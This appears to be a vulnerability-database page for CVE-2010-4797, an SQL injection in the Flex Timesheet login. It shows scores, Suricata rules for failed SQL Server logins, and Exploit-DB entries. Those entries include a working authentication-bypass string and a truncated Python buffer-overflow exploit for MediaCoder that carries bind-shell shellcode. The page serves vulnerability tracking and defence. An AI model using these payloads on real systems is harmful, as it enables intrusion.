CVE-2010-4797
published 2011-04-27CVE-2010-4797: Multiple SQL injection vulnerabilities in the log-in form in Truworth Flex Timesheet allow remote attackers to execute arbitrary SQL commands via the (1)…
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.15%
62.9th percentile
Multiple SQL injection vulnerabilities in the log-in form in Truworth Flex Timesheet allow remote attackers to execute arbitrary SQL commands via the (1) Username and (2) Password fields.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL SQL sa brute force failed login unicode attempt
suricata·2010-09-23
CVE-2000-1209 GPL SQL sa brute force failed login unicode attempt
GPL SQL sa brute force failed login unicode attempt
Rule: alert tcp $SQL_SERVERS 1433 -> $EXTERNAL_NET any (msg:"GPL SQL sa brute force failed login unicode attempt"; flow:established,to_client; content:"L|00|o|00|g|00|i|00|n|00| |00|f|00|a|00|i|00|l|00|e|00|d|00| |00|f|00|o|00|r|00| |00|u|00|s|00|e|00|r|00| |00|'|00|s|00|a|00|'|00|"; threshold:type threshold, track by_src, count 5, seconds 2; reference:bugtraq,4797; reference:cve,2000-1209; reference:nessus,10673; classtype:unsuccessful-user; sid:2103273; rev:5; metadata:created_at 2010_09_23, cve CVE_2000_1209, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL SQL sa brute force failed login attempt
suricata·2010-09-23
CVE-2000-1209 GPL SQL sa brute force failed login attempt
GPL SQL sa brute force failed login attempt
Rule: alert tcp $SQL_SERVERS 1433 -> $EXTERNAL_NET any (msg:"GPL SQL sa brute force failed login attempt"; flow:established,to_client; content:"Login failed for user 'sa'"; threshold:type threshold, track by_src, count 5, seconds 2; reference:bugtraq,4797; reference:cve,2000-1209; reference:nessus,10673; classtype:unsuccessful-user; sid:2103152; rev:5; metadata:created_at 2010_09_23, cve CVE_2000_1209, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL SQL sa login failed
suricata·2010-09-23
CVE-2000-1209 GPL SQL sa login failed
GPL SQL sa login failed
Rule: alert tcp $SQL_SERVERS 139 -> $EXTERNAL_NET any (msg:"GPL SQL sa login failed"; flow:established,to_client; content:"Login failed for user 'sa'"; offset:83; reference:bugtraq,4797; reference:cve,2000-1209; classtype:attempted-user; sid:2100680; rev:11; metadata:created_at 2010_09_23, cve CVE_2000_1209, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL SQL sa login failed
suricata·2010-09-23
CVE-2000-1209 GPL SQL sa login failed
GPL SQL sa login failed
Rule: alert tcp $SQL_SERVERS 1433 -> $EXTERNAL_NET any (msg:"GPL SQL sa login failed"; flow:established,to_client; content:"Login failed for user 'sa'"; reference:bugtraq,4797; reference:cve,2000-1209; reference:nessus,10673; classtype:unsuccessful-user; sid:2100688; rev:12; metadata:created_at 2010_09_23, cve CVE_2000_1209, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Exploit-DB
Mediacoder 0.7.5.4797 - '.m3u' Local Buffer Overflow (SEH)
exploitdb·2010-12-02
Mediacoder 0.7.5.4797 - '.m3u' Local Buffer Overflow (SEH)
Mediacoder 0.7.5.4797 - '.m3u' Local Buffer Overflow (SEH)
---
# Exploit Title: MediaCoder-0.7.5.4795.exe 0-days Buffer Overflow (SEH)
# Date: 02 / 12 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.mediacoderhq.com/mirrors.htm?file=MediaCoder-0.7.5.4795.exe
# Version: v0.7.5.4795 (Latest Version !!)
# Tested on: Microsoft Windows XP SP2
# CVE : N / A
# The vendor is very pitiful . This is the latest version just release in 1 / 12 / 2010
# The software has been exploited at 2 / 12 / 2010
# THis is so sad ! ==
#!/usr/bin/python
filename = "crash.m3u"
junk = "\x41" * 764
pointer = "\xEB\x08\x90\x90"
handler = "\x54\x41\x62\x01" # 01624154
nops = "\x90" * 20
# Bind a shell at Port 5555 (Telnet in and Boom !! DEADBEEF !)
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x
Exploit-DB
Flex Timesheet - Authentication Bypass
exploitdb·2010-10-08
CVE-2010-4797 Flex Timesheet - Authentication Bypass
Flex Timesheet - Authentication Bypass
---
Flex Timesheet - Authentication Bypass() Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
{ H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Flex Timesheet
~Software: http://truworthit.com/ - Price:200$
~Vulnerability Style : Authentication Bypass()
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
bypass foR Sql-i Code()
Username : 'or'h4x0reSEC
Password : 'or'h4x0reSEC
[+] Logged on.
GoodLucK ;)
# Inj3ct0r.com [2010-09-28]
No writeups or analysis indexed.
http://packetstormsecurity.org/1010-exploits/flextimesheet-sql.txthttp://secunia.com/advisories/41763http://securityreason.com/securityalert/8222http://www.exploit-db.com/exploits/15220http://www.securityfocus.com/bid/43886https://exchange.xforce.ibmcloud.com/vulnerabilities/62374http://packetstormsecurity.org/1010-exploits/flextimesheet-sql.txthttp://secunia.com/advisories/41763http://securityreason.com/securityalert/8222http://www.exploit-db.com/exploits/15220http://www.securityfocus.com/bid/43886https://exchange.xforce.ibmcloud.com/vulnerabilities/62374
2011-04-27
Published